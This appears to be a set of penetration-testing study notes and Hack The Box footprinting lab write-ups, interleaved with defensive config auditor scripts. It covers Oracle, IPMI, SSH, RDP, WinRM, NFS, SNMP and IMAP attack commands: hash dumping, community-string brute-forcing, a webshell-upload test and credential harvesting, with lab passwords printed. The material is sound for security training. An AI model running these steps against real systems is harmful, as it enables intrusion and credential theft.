    sudo nmap -p1521 -sV 10.129.204.235 --open

    # the SID is used to identify DB instances
    # brute-force the SID
    sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

    # odat can scan to enumerate the oracle db
    ./odat.py all -s 10.129.204.235

    # connect to db and interact if we have creds
    sqlplus scott/tiger@10.129.204.235/XE

    select table_name from all_tables;

    select * from user_role_privs;

    # test if the user has sysdba access
    # we can retrieve password hashes and try to crack them offline
    sqlplus scott/tiger@10.129.204.235/XE as sysdba

    select name, password from sys.user$;

    # we can upload webshell
    # target needs to have a web server running
    # linux default path /var/www/html
    # windows default path C:\inetpub\wwwroot
    echo "Oracle File Upload Test" > testing.txt

    ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

    curl -X GET http://10.129.204.235/testing.txt


    # if came across this error: sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory
    sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

IPMI

  • Intelligent Platform Management Interface is a set of standardized specifications for hardware-based host management
  • used for system management and monitoring even when the host is powered down or has suffered a system failure
  • Footprinting
    sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

    # metasploit version scan
    use auxiliary/scanner/ipmi/ipmi_version
    set rhosts 10.129.5.224
    show options
    run

    # retrieve IPMI hashes
    use auxiliary/scanner/ipmi/ipmi_dumphashes

    # crack ipmi hashed password
    hashcat -m 7300 hash.txt --wordlist /usr/share/wordlists/rockyou.txt

Remote Management Protocols

Linux

SSH

  • SSH enables two computers to establish an encrypted and direct connection on port tcp/22

  • SSH servers can be configured to only allow connections from specific clients

  • Linux distributions use the open-source OpenBSD Secure Shell (OpenSSH)

  • SSH-2 offers more advanced encryption, speed, stability and security than SSH-1

  • the most common authentication method used is public-key authentication; OpenSSH has 6 different authentication methods:

    • Password
    • Public-key
    • Host-based
    • Keyboard
    • Challenge-response
    • GSSAPI
  • default configuration can be found /etc/ssh/sshd_config

  • dangerous settings:

    • PasswordAuthentication yes
    • PermitEmptyPasswords yes
    • PermitRootLogin yes
    • Protocol 1
    • X11Forwarding yes
    • AllowTcpForwarding yes
    • PermitTunnel
    • DebianBanner yes
  • Footprinting

    # fingerprint the SSH server
    git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
    ./ssh-audit.py 10.129.14.132

    # can output authentication methods used
    ssh -v cry0l1t3@10.129.14.132

    # for brute-force attacks we can specify the authentication method
    ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password
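Added example (not from the HTB module or these notes) serving the three "Dangerous settings" lists on this page, for vsftpd.conf (FTP), smb.conf (SMB) and sshd_config (SSH): a single auditor with a small parser per format that reports each setting found at the value the page calls dangerous, together with a safer value. It also encodes one sshd_config rule that trips people up: for each keyword the first value in the file wins, so a hardening line appended at the end changes nothing. The config fragments inside are constructed, and the recommended values are this example's suggestions, not text from the page.

```python
# Constructed sample fragments of the three config files (not from any real host).
SAMPLE_VSFTPD = """\
anonymous_enable=YES
anon_upload_enable=YES
write_enable=YES
chroot_local_user=YES
"""

SAMPLE_SMB = """\
[global]
   workgroup = WORKGROUP

[notes]
   browseable = yes
   read only = no
   guest ok = yes
   create mask = 0777

[printers]
   browseable = no
"""

SAMPLE_SSHD = """\
#PermitRootLogin prohibit-password
PermitRootLogin yes
PermitRootLogin no
PasswordAuthentication yes
PermitEmptyPasswords no
X11Forwarding yes
"""

# setting -> (value the page calls dangerous, safer value to recommend)
RULES = {
    "vsftpd": {
        "anonymous_enable": ("YES", "NO"),
        "anon_upload_enable": ("YES", "NO"),
        "anon_mkdir_write_enable": ("YES", "NO"),
        "no_anon_password": ("YES", "NO"),
        "write_enable": ("YES", "NO unless uploads are required"),
    },
    "smb": {
        "browseable": ("yes", "no for shares that need not be listed"),
        "read only": ("no", "yes"),
        "writable": ("yes", "no"),
        "guest ok": ("yes", "no"),
        "enable privileges": ("yes", "no"),
        "create mask": ("0777", "0644 or tighter"),
        "directory mask": ("0777", "0755 or tighter"),
    },
    "sshd": {
        "permitrootlogin": ("yes", "no or prohibit-password"),
        "passwordauthentication": ("yes", "no (public-key only)"),
        "permitemptypasswords": ("yes", "no"),
        "protocol": ("1", "2"),
        "x11forwarding": ("yes", "no"),
        "allowtcpforwarding": ("yes", "no"),
        "debianbanner": ("yes", "no"),
    },
}


def parse_config(text, fmt):
    """Return [(section, key, value)] for vsftpd (key=value), smb.conf
    ([section] + key = value) or sshd_config (Keyword value).
    For sshd the FIRST occurrence of a keyword wins, as sshd itself behaves."""
    entries, section, seen = [], "global", set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(";"):
            continue
        if fmt == "smb" and line.startswith("["):
            section = line.strip("[]")
            continue
        if fmt == "sshd":
            parts = line.split(None, 1)
            key, value = parts[0].lower(), (parts[1] if len(parts) > 1 else "")
            if key in seen:
                continue
            seen.add(key)
        else:
            key, sep, value = line.partition("=")
            if not sep:
                continue
        entries.append((section, key.strip().lower(), value.strip()))
    return entries


def audit_config(text, fmt):
    """One finding per setting whose value matches the dangerous value."""
    findings = []
    for section, key, value in parse_config(text, fmt):
        rule = RULES[fmt].get(key)
        if rule and value.lower() == rule[0].lower():
            findings.append({"section": section, "key": key,
                             "value": value, "recommend": rule[1]})
    return findings


if __name__ == "__main__":
    for fmt, sample in (("vsftpd", SAMPLE_VSFTPD), ("smb", SAMPLE_SMB), ("sshd", SAMPLE_SSHD)):
        for f in audit_config(sample, fmt):
            print(f"{fmt} [{f['section']}] {f['key']} = {f['value']} -> {f['recommend']}")
```

Point it at the real files (`/etc/vsftpd.conf`, `/etc/samba/smb.conf`, `/etc/ssh/sshd_config`) by reading them into `text`; the smb.conf parser reports the share name as the section, so a `guest ok = yes` hit can be tied to the exact share.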

Rsync

  • Rsync is a fast and efficient tool for locally and remotely copying files

  • it is often used for backup and monitoring

  • by default, it uses port tcp/873 and can be configured to use SSH for secure file transfers

  • Footprinting

    # scan for rsync
    sudo nmap -sV -p 873 127.0.0.1

    # probe accessible shares
    nc -nv 127.0.0.1 873

    # enumerate an open share
    rsync -av --list-only rsync://127.0.0.1/dev

R-services

  • R-services are a suite of services hosted to enable remote access or issue commands between Unix hosts over TCP/IP

  • they are only accessible through a suite of programs known as r-commands; they span the ports 512, 513, and 514

  • the r-commands consist of the following:

    • rcp (remote copy)
    • rexec (remote execution)
    • rlogin (remote login)
    • rsh (remote shell)
    • rstat
    • ruptime
    • rwho (remote who)
  • most abused commands are rcp, rsh, rexec and rlogin

  • list of trusted hosts can be found at /etc/hosts.equiv

  • Footprinting

    # scan
    sudo nmap -sV -p 512,513,514 10.0.17.2

    # login if .rhosts is misconfigured
    rlogin 10.0.17.2 -l htb-student

    # if logged in, list authenticated users using rwho
    rwho

    # list authenticated users with Rusers
    rusers -al 10.0.17.5

Windows

RDP

  • Remote Desktop Protocol was created by Microsoft for remote access to computers running Windows
  • allows display and control commands to be transmitted via GUI, encrypted, over IP networks
  • works at the application layer and uses port tcp/3389
  • handles TLS/SSL itself, which means all data is encrypted
  • Footprinting
    nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

    # --packet-trace can be used to track the individual packets and inspect their contents manually
    nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n

    # rdp-sec-check.pl can identify the security settings of RDP servers without authenticating
    sudo cpan

    cpan[1]> install Encoding::BER

    git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check

    ./rdp-sec-check.pl 10.129.201.248

    # xfreerdp / rdesktop / Remmina can be used to RDP with GUI
    xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248

WinRM

  • is a simple Windows-integrated remote management protocol based on the command line
  • uses the Simple Object Access Protocol (SOAP) to establish connections on port tcp/5985 (HTTP) and tcp/5986 (HTTPS)
  • Windows Remote Shell (WinRS) is a component of WinRM that lets us execute arbitrary commands on the remote system
  • Footprinting
    nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

    # interact with winrm
    evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!

WMI

  • Windows Management Instrumentation is an extension of the Common Information Model (CIM); a core functionality of the standardized WBEM for the Windows platform
  • allows read and write access to almost all settings on Windows systems
  • is accessed via PowerShell, VBScript, or WMIC
  • consists of several programs and various databases known as repositories
  • initialization takes place on port tcp/135; communication moves to a random port after a successful connection
  • Footprinting
    /usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"

Footprinting Lab - Easy

We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.

The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.

Additionally, our teammates have found the following credentials “ceil:qwer1234”, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.

The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.

Let’s scan the network first

$ sudo nmap -sC -sV 10.129.42.195    
[sudo] password for kali:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 11:18 -0500
Nmap scan report for 10.129.42.195
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp ProFTPD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Trying to log in over SSH, it requires a private key

Using the credentials provided we log in to FTP on port 21, but no files are present on the FTP server.

Logging in to port 2121, we’re able to find the .ssh folder

$ ftp ftp://ceil:qwer1234@10.129.42.195 -P 2121

ftp> ls -la
229 Entering Extended Passive Mode (|||39575|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo

Download the private key

ftp> cd .ssh
ftp> ls -lah
229 Entering Extended Passive Mode (|||32992|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4.0k Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4.0k Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3.3k Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||6928|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*******************************************************************************************************************| 3381 22.18 KiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (4.75 KiB/s)
ftp>

We’ll now SSH using that key and grab the flag found at /home/flag

$ ssh ceil@10.129.42.195 -i id_rsa  

Footprinting Lab - Medium

This second server is a server that everyone on the internal network has access to. In our discussion with our client, we pointed out that these servers are often one of the main targets for attackers and that this server should be added to the scope.

Our customer agreed to this and added this server to our scope. Here, too, the goal remains the same. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named HTB has been created. Accordingly, we need to obtain the credentials of this user as proof.

$ sudo nmap -sS 10.129.15.232
$ sudo nmap -sC -sV -p111,135,139,445,2049,3389,5985 10.129.15.232
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 12:28 -0500
Nmap scan report for 10.129.15.232
Host is up (0.31s latency).

PORT STATE SERVICE VERSION
111/tcp open rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nfs 2-4 (RPC #100003)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WINMEDIUM
| Not valid before: 2026-02-20T17:26:22
|_Not valid after: 2026-08-22T17:26:22
| rdp-ntlm-info:
| Target_Name: WINMEDIUM
| NetBIOS_Domain_Name: WINMEDIUM
| NetBIOS_Computer_Name: WINMEDIUM
| DNS_Domain_Name: WINMEDIUM
| DNS_Computer_Name: WINMEDIUM
| Product_Version: 10.0.17763
|_ System_Time: 2026-02-21T17:29:28+00:00
|_ssl-date: 2026-02-21T17:29:37+00:00; -10s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-02-21T17:29:31
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.61 seconds

Connecting to the SMB shares without credentials fails

$ smbclient -N -L 10.129.15.232                                   
session setup failed: NT_STATUS_ACCESS_DENIED

NFS shows one available export

$ showmount -e 10.129.15.232
Export list for 10.129.15.232:
/TechSupport (everyone)

Let’s create a folder and mount the share

$ mkdir target-NFS
$ sudo mount -t nfs 10.129.15.232:/TechSupport ~/target-NFS -o nolock

As our normal user we don’t have permission to view the share

$ cd target-NFS            
cd: permission denied: target-NFS
$ ls target-NFS
ls: cannot open directory 'target-NFS': Permission denied

It looks like root is not squashed on this export, which means we can access the directory as root

$ sudo bash -c 'id; ls -ldn /home/kali/target-NFS; ls -la /home/kali/target-NFS'
uid=0(root) gid=0(root) groups=0(root)
drwx------ 2 4294967294 4294967294 65536 Feb 21 12:26 /home/kali/target-NFS
<-SNIP->
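
The root-squash problem seen here is a server-side export setting. As an added example that is not part of the original write-up, the following Python audits an /etc/exports file (constructed sample, not the lab server's configuration) for exports open to every client and for exports where root is not squashed:

```python
"""Audit /etc/exports for world-open exports and missing root squashing.

Constructed sample below; it is not the lab server's real configuration."""
import re

SAMPLE_EXPORTS = """\
# constructed /etc/exports
/srv/techsupport  *(rw,sync,no_root_squash)
/srv/backup       10.10.0.0/16(ro,sync,root_squash)
/srv/home         192.168.1.50(rw,sync) 192.168.1.51(rw,sync,no_subtree_check)
"""

# client spec is "<host-or-network>(<comma separated options>)"
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        # exportfs treats a path without any client spec as exported to the world
        path, specs = fields[0], fields[1:] or ["*"]
        for spec in specs:
            client, opts = CLIENT_RE.match(spec).groups()
            options = [o for o in (opts or "").split(",") if o]
            yield path, client or "*", options


def audit_exports(text):
    """Return findings as (path, client, issue) tuples."""
    findings = []
    for path, client, options in parse_exports(text):
        if client == "*":
            findings.append((path, client, "exported to every client"))
        # exportfs squashes root by default; no_root_squash switches that off,
        # so uid 0 on any permitted client is uid 0 on the server's files.
        if "no_root_squash" in options:
            findings.append((path, client, "root not squashed"))
    return findings


if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {issue}")
```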

Let’s change our user to root and access the server

$ sudo -i 
# cd /home/kali/target-NFS

The share contains a large number of ticket text files

# ls
ticket4238791283649.txt ticket4238791283675.txt ticket4238791283701.txt ticket4238791283727.txt ticket4238791283753.txt ticket4238791283779.txt
<-SNIP->

The description mentions that a user named HTB has been created, so we search the tickets for that name

# grep -Rin --color=auto "HTB" .     
./ticket4238791283782.txt:16: 2 host=smtp.web.dev.inlanefreight.htb
./ticket4238791283782.txt:21: 7 from="alex.g@web.dev.inlanefreight.htb"

The ticket we found contains the credentials for the user alex

# cat ticket4238791283782.txt
Conversation with InlaneFreight Ltd

Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,.

So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:

1smtp {
2 host=smtp.web.dev.inlanefreight.htb
3 #port=25
4 ssl=true
5 user="alex"
6 password="lol123!mD"
7 from="alex.g@web.dev.inlanefreight.htb"
8}
9
<-SNIP->

Using these credentials we’re able to list the SMB shares

$ smbclient -L 10.129.15.232 -U alex%lol123\!mD

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
devshare Disk
IPC$ IPC Remote IPC
Users Disk

Connecting to the devshare share, we find important.txt, which contains credentials.
The username sa tells us these are probably credentials for Microsoft SQL Server (used via SQL Server Management Studio)

$ smbclient //10.129.15.232/devshare -U alex%lol123\!mD
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Nov 10 11:12:22 2021
.. D 0 Wed Nov 10 11:12:22 2021
important.txt A 16 Wed Nov 10 11:12:55 2021

10328063 blocks of size 4096. 6101443 blocks available
smb: \> get important.txt
smb: \> !cat important.txt
sa:87N1ns@slls83

We RDP to the server using xfreerdp3

$ xfreerdp3 /v:10.129.15.232 /u:alex /p:"lol123\!mD" /cert:ignore

After connecting to the server, we see SSMS (SQL Server Management Studio) on the desktop

We’ll run the application as Administrator (Right Click > Run as Administrator) and enter the password 87N1ns@slls83

There’s only one database called accounts

We query the database and find the user HTB

SELECT * from dbo.devsacc;

<-SNIP->

id 157
name HTB
password lnch7ehrdn43i7AoqVPK4zWR

<-SNIP->

Footprinting Lab - Hard

The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.

$ ip=10.129.18.134; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 07:23 -0500
Nmap scan report for 10.129.18.134
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL TOP AUTH-RESP-CODE CAPA RESP-CODES SASL(PLAIN) PIPELINING USER STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_imap-capabilities: listed AUTH=PLAINA0001 post-login have ENABLE OK LOGIN-REFERRALS IDLE more capabilities Pre-login LITERAL+ STARTTLS ID SASL-IR IMAP4rev1
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: listed AUTH=PLAINA0001 have ENABLE OK LOGIN-REFERRALS IDLE more post-login capabilities Pre-login LITERAL+ ID SASL-IR IMAP4rev1
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.04 seconds

IMAP and POP3 both require credentials for us to do anything with them.

Next we scan the top UDP ports

$ sudo nmap -sU --top-ports 100 10.129.18.134 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 08:16 -0500
Nmap scan report for 10.129.18.134
Host is up (0.15s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp
1900/udp open|filtered upnp

Nmap done: 1 IP address (1 host up) scanned in 109.38 seconds

SNMP is open, so we can start footprinting the service.

We’ll use onesixtyone to brute-force the community string

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.18.134 
Scanning 1 hosts, 3219 communities
10.129.18.134 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

We found the community string backup

Walking the MIB with snmpwalk, we find user credentials

$ snmpwalk -v2c -c backup 10.129.18.134 

<-SNIP->

iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"

<-SNIP->

iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"

<-SNIP->
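
The OID index in the two lines above encodes the extension name: `6.66.65.67.75.85.80` is a length of 6 followed by the ASCII bytes of BACKUP, and column 3 carries the script's argument string, which is where the credentials leaked. As an added example (not part of the original write-up), this Python parses snmpwalk's numeric output, decodes the extension names and lists which extensions expose arguments; the sample lines are constructed and the names and values are not from the lab host:

```python
"""Decode extension-table rows from snmpwalk output and flag argument leaks.

Constructed sample output; hostnames, scripts and values are made up."""
import re

SAMPLE_WALK = """\
iso.3.6.1.2.1.1.5.0 = STRING: "EXAMPLEHOST"
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/example-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "svc Example-Secret-1"
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.72.69.65.76.84.72 = STRING: "/usr/local/bin/healthcheck"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.72.69.65.76.84.72 = STRING: ""
"""

# table prefix as it appears in the walk; rows are <column>.<string index>
EXTEND_PREFIX = "iso.3.6.1.2.1.25.1.7.1.2.1."
LINE_RE = re.compile(r'^(\S+) = STRING: "(.*)"$')


def decode_string_index(index):
    """'6.66.65.67.75.85.80' -> 'BACKUP' (length, then one sub-id per byte)."""
    parts = [int(p) for p in index.split(".")]
    length, codes = parts[0], parts[1:]
    if len(codes) != length:
        raise ValueError(f"index claims {length} bytes but has {len(codes)}")
    return bytes(codes).decode("ascii")


def extension_table(walk_text):
    """Return {extension_name: {column_number: value}} from snmpwalk output."""
    table = {}
    for line in walk_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m.group(1).startswith(EXTEND_PREFIX):
            continue
        column, _, index = m.group(1)[len(EXTEND_PREFIX):].partition(".")
        name = decode_string_index(index)
        table.setdefault(name, {})[int(column)] = m.group(2)
    return table


def extensions_with_arguments(walk_text):
    """Names of extensions whose argument column (3) is non-empty: anything
    placed there, passwords included, is readable with the community string."""
    return sorted(name for name, cols in extension_table(walk_text).items()
                  if cols.get(3))


if __name__ == "__main__":
    for name, cols in extension_table(SAMPLE_WALK).items():
        print(name, cols.get(2), repr(cols.get(3)))
    print("extensions exposing arguments:", extensions_with_arguments(SAMPLE_WALK))
```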

We can now log in to IMAP or POP3 using these credentials: tom:NMds732Js2761

$ curl -k 'imaps://10.129.18.134' --user tom:NMds732Js2761                 
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX

The only email in INBOX contains an SSH private key

$ curl -k 'imaps://10.129.18.134/Meetings' -X 'UID SEARCH ALL' --user tom:NMds732Js2761
* SEARCH
$ curl -k 'imaps://10.129.18.134/Important' -X 'UID SEARCH ALL' --user tom:NMds732Js2761
* SEARCH
$ curl -k 'imaps://10.129.18.134/INBOX' -X 'UID SEARCH ALL' --user tom:NMds732Js2761
* SEARCH 1

$ curl -k 'imaps://10.129.18.134/INBOX/;UID=1' --user tom:NMds732Js2761
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY

-----BEGIN OPENSSH PRIVATE KEY-----

<-SNIP->

-----END OPENSSH PRIVATE KEY-----

We’re going to save the key to a file

$ vim tom_key

Restrict the key file’s permissions so ssh will accept it.

$ chmod 600 tom_key

SSH login using the key

$ ssh -i tom_key tom@10.129.18.134

tom@NIXHARD:~$

We find a MySQL service account among the local system accounts, so MySQL is installed on the host

tom@NIXHARD:/$ cat /etc/passwd
<-SNIP->
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
<-SNIP->

Let’s try to log in to MySQL using the credentials we have for tom

tom@NIXHARD:~$ mysql -u tom -p'NMds732Js2761'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Login was successful.

Enumerating the users database, we find HTB’s credentials

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.03 sec)

mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+-------------------+------------------------------+
| id | username | password |
+------+-------------------+------------------------------+
<-SNIP->
| 150 | HTB | cr3n4o7rzse7rzhnckhssncif7ds |
<-SNIP->
+------+-------------------+------------------------------+
200 rows in set (0.00 sec)